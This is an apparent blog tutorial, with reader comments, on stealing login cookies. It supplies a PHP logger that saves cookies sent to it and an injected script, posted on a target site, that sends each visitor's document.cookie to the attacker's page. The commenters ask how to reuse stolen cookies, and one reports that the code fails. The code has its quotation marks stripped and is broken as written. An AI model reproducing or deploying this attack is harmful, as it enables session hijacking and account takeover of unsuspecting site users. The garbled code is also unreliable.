How to Steal Someone's Login Cookie Online

In this tutorial you'll learn how to steal someones login cookie.
Open notepad.
There type:
<?php
$cookie = $_GET['cookie'];
$log = fopen( log.txt , a );
fwrite($log, $cookie . \n );
fclose($log);
?>
After that save is at .php.
Than go to a site where you want to steal login cookies.
Than make a post which should look like this:
<script>
document.location = http://linkofyourphp.php?cookie= + document.cookie;
</script>
Than who enters there will send you his login cookie for that site.Login cookie will be in .txt file.
I hope that works for you.

6 comments:

  1. where does it save the cookie to?

    ReplyDelete
  2. Is there anyway to import that cookie into another browser?

    ReplyDelete
  3. not working error Fatal error: Undefined constant 'n' in /home/u489592246/public_html/call-of-duty/index.html on line 4

    ReplyDelete
  4. can you plz give a tutorial in videoo

    ReplyDelete
  5. u r putting wrong code boss dear

    ReplyDelete

Snow-Falling-Effect